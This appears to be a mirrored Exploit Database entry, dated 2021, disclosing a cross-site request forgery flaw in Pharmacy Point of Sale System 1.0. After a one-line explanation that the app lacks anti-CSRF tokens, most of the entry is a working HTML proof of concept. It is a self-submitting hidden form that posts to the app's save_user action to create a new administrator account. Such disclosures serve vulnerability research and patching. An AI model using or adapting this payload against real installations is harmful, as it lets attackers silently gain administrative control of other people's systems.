Pharmacy Point of Sale System 1.0 – ‘Add New User’ Cross-Site Request Forgery (CSRF)

• Exploit Database
• 16 阅读

• 作者： Murat DEMİRCİ
  日期： 2021-10-13
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/50409/

• # Exploit Title: Pharmacy Point of Sale System 1.0 - 'Add New User' Cross-Site Request Forgery (CSRF)
  # Date: 10/11/2021
  # Exploit Author: Murat DEMIRCI (@butterflyhunt3r)
  # Vendor Homepage: https://www.sourcecodester.com/
  # Software Link: https://www.sourcecodester.com/php/14957/pharmacy-point-sale-system-using-php-and-sqlite-free-source-code.html
  # Version: 1
  # Tested on: Windows 10
  
  Detail:
  The application is not using any security token to prevent it against CSRF. Therefore, malicious user can add new administrator user account by using crafted post request.
  
  CSRF PoC:
  
  --------------------------------------------------------------------------------------
  
  <html>
  <!-- CSRF PoC - generated by Burp Suite Professional -->
  <body>
  <script>history.pushState('', '', '/')</script>
  <form action="http://localhost/pharmacy/Actions.php?a=save_user" method="POST">
  <input type="hidden" name="id" value="" />
  <input type="hidden" name="fullname" value="Mrt" />
  <input type="hidden" name="username" value="NewAdmin" />
  <input type="hidden" name="type" value="1" />
  <input type="submit" value="Submit request" />
  </form>
  <script>
  document.forms[0].submit();
  </script>
  </body>
  </html>
  
  --------------------------------------------------------------------------------------